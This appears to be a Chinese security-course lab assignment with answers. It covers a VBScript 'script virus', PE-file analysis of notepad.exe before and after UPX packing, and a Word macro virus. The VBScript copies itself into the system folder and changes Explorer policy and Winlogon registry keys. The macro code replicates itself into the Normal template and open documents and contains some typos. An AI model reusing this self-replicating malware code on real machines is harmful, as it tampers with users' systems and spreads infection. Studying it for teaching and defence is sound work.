1、脚本病毒(10分)
编写脚本病毒代码并运行脚本,每个任务的脚本代码以单独文件的形式保存并提交,用录像工具录取脚本运行现象,脚本任务具体内容包括:
(1)禁止“运行”菜单;(5分)
On Error Resume Next
Set fs=CreateObject(“Scripting.FileSystemObject”)
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject(“Scripting.FileSystemObject”)
dim r
Set r=CreateObject(“Wscript.Shell”)
so.GetFile(WScript.ScriptFullName).Copy(dir2&“\Win32system.vbs”)
r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,1,“REG_DWORD”
r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,“S”
r.Regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,“S”
(2)禁止“显示桌面所有图标”;(5分)
On Error Resume Next '启动或关闭一个错误处理常式
dim r '定义变量
Set r=CreateObject(“Wscript.Shell”) '创建并返回一个对 ActiveX 对象的引用
r.Regwrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”,0,“REG_DWORD”
'设置指定的注册表键或值;此为隐藏关闭按钮
2、PE文件分析(20分)
(1)用提供的工具PEditor查看系统中的“notepad.exe”的文件信息,完成下题:
1)查看“notepad.exe”共有 个节,分别是 。(4分)
2)文件头的特征值是 。(1分)
3)文件头部大小为 。(1分)
(2)用提供的压缩器UPX对notepad.exe进行压缩后生成notepad_upx.exe文件(3分),并完成下题:
1)用PEditor查看notepad_upx.exe文件共有 个节,分别是 。(4分)
2)比较notepad.exe和notepad_upx.exe的大小,在录像中打开相应窗口,完成比较即可。(2分)
(3)用Win Hex分别打开notepad.exe和notepad_upx.exe文件(2分),再比较PE头部分,用语言描述有什么不同 。(3分)
3、宏病毒(15分)
编写一段能够自我复制,感染word公用模板和当前文档的宏病毒并运行,观察word文档中毒之后的现象,然后对病毒进行清除。要求如下:
(1)弹出窗口的内容为“恭喜你中毒了”;(5分)
(2)使用录屏工具对实验过程(包括代码编写)进行录屏; (5分)
(3)描述清除病毒及加固的方法;(注:直接答在该题下面)(5分)
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Opitons.SaveNormaPrompt = False
Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> “'Micro-Virus” Then
.DeleteLine 1, .CountOflines
.InsertLines 1, Ourcode
.ReplaceLine2 , “SubDocument_Close()”
If ThisDocument = nomaltemplate Then
.replaceline 2, “Sub Document_Open()”
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End If
End With
MsgBox “恭喜你中毒了”
End Sub
一旦发现计算机Office软件打开后弹出系统警告框,并且无法“另存为”,就表示该文件已感染宏病毒,此时不能再打开其他文件,否则病毒也会感染,应马上关闭删除该文件。若文件重要不能删除,则需用杀毒软件全盘扫面,处理感染文件;
开启禁用宏进行防止再次感染病毒。在“受信任位置”中,删除“可靠来源”列表框中的不安全来源,根据实际情况设置是否信任所有安装的加载项和模板,设置宏的安全性;
安装杀毒软件,打全系统补丁是预防计算机病毒的基本措施,当然也适用于宏病毒,除此这些常规手段之外,宏病毒还有专门的防治措施;
